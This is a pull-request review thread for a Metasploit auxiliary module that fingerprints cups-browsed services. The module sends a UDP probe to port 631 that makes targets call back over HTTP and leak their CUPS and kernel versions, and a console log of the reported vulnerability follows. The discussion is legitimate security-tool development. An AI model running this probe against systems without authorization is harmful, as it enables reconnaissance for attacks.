modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.rb

```diff
@@ -0,0 +1,59 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize
+    super(
+      'Name' => 'cups-browsed Information Disclosure',
+      'Description' => %q{
+        Retrieve CUPS version and kernel version information from cups-browsed services.
+      },
+      'Author' => [
+        'evilsocket', # discovery
+        'bcoles' # msf
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8' ],
+        ['URL', 'https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/' ],
+      ],
+      'DefaultOptions' => { 'RPORT' => 631 },
+    )
+    deregister_options('URIPATH')
+  end
+
+  def build_probe
+    @probe ||= "0 3 #{get_uri}"
+    @probe
+  end
+
+  def run
+    start_service('Path' => "/printers/#{Rex::Text.rand_text_alphanumeric(10..16)}")
+    super
+  end
+
+  def on_request_uri(cli, request)
+    return if request.nil?
+
+    info = request['User-Agent']
+
+    return unless info.to_s.include?('CUPS')
+
+    print_good("#{cli.peerhost}: #{info}")
+
+    report_host(host: cli.peerhost)
+    report_service(
+      host: cli.peerhost,
+      proto: 'udp',
+      port: rport,
+      name: 'cups-browsed',
+      info: info
+    )
+  end
```

Comment:
I think we can throw on a `report_vuln` call here to register it as a vulnerability

Reply:
> I think we can throw on a `report_vuln` call here to register it as a vulnerability

Done

```
msf6 auxiliary(scanner/misc/cups_browsed_info_disclosure) > vulns 

Vulnerabilities
===============

Timestamp                Host             Name                                 References
---------                ----             ----                                 ----------
2024-08-15 21:30:58 UTC  192.168.200.132  cups-browsed information disclosure  URL-https://github.com/OpenPrinting/cups-browsed/secu
                                                                               rity/advisories/GHSA-rj88-6mr5-rcw8,URL-https://www.e
                                                                               vilsocket.net/2024/09/26/Attacking-UNIX-systems-via-C
                                                                               UPS-Part-I/
```